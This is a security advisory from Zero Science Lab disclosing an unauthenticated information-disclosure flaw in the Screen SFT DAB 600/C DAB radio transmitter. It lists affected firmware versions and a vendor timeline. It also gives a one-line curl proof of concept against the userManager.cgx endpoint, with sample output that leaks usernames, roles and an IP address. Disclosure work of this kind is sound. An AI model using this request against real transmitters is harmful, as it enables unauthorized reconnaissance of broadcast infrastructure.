Gjoko KrsticZSL-2023-5776Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)
7.2 High
AI Score
Confidence
Low
Title: Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)
Advisory ID: ZSL-2023-5776
Type: Local/Remote
Impact: Spoofing, Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 13.05.2023
Summary
Screen’s new radio DAB Transmitter is reaching the highest technology level in both Digital Signal Processing and RF domain. SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the digital adaptive precorrection and configuatio flexibility, the Hot Swap System technology, the compactness and the smart system design, the SFT DAB are advanced transmitters. They support standards DAB, DAB+ and T-DMB and are compatible with major headend brands.
Description
Screen is affected by an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this, via a specially crafted request to gain access to sensitive information including usernames and source IP addresses.
Vendor
DB Elettronica Telecomunicazioni SpA - <https://www.screen.it> | <https://www.dbbroadcast.com>
Affected Version
Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Tested On
Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vendor Status
[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <https://www.exploit-db.com/exploits/51460>
[2] <https://packetstormsecurity.com/files/172332/>
Changelog
[13.05.2023] - Initial release
[12.10.2023] - Added reference [1] and [2]
Contact
Zero Science Lab
Web: <https://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)
Vendor: DB Elettronica Telecomunicazioni SpA
Product web page: https://www.screen.it | https://www.dbbroadcast.com
https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
Affected version: Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Summary: Screen's new radio DAB Transmitter is reaching the highest
technology level in both Digital Signal Processing and RF domain.
SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
digital adaptive precorrection and configuatio flexibility, the Hot
Swap System technology, the compactness and the smart system design,
the SFT DAB are advanced transmitters. They support standards DAB,
DAB+ and T-DMB and are compatible with major headend brands.
Desc: Screen is affected by an information disclosure vulnerability
due to improper access control enforcement. An unauthenticated remote
attacker can exploit this, via a specially crafted request to gain
access to sensitive information including usernames and source IP
addresses.
Tested on: Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5776
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5776.php
19.03.2023
--
$ curl 'http://SFTDAB/system/api/userManager.cgx'
{"ssbtType":"userManager","ssbtIdx":0,"ssbtObj":{"admin":false,"users":[{"user":"testingus","type":"GUEST","connected":false,"info":null},{"user":"joxy","type":"OPERATOR","connected":false,"info":null},{"user":"dude","type":"OPERATOR","connected":true,"info":{"ip":"192.168.178.150","tmo":120}}]}}
</p></body></html>7.2 High
AI Score
Confidence
Low